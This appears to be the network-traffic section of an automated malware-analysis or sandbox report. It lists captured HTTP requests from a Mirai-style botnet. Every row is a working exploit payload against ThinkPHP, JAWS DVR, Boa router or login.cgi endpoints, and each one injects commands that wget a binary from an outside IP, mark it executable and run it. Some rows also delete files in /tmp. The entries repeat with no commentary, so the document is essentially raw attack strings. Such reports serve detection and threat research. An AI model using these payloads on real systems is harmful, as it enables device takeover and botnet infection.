| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
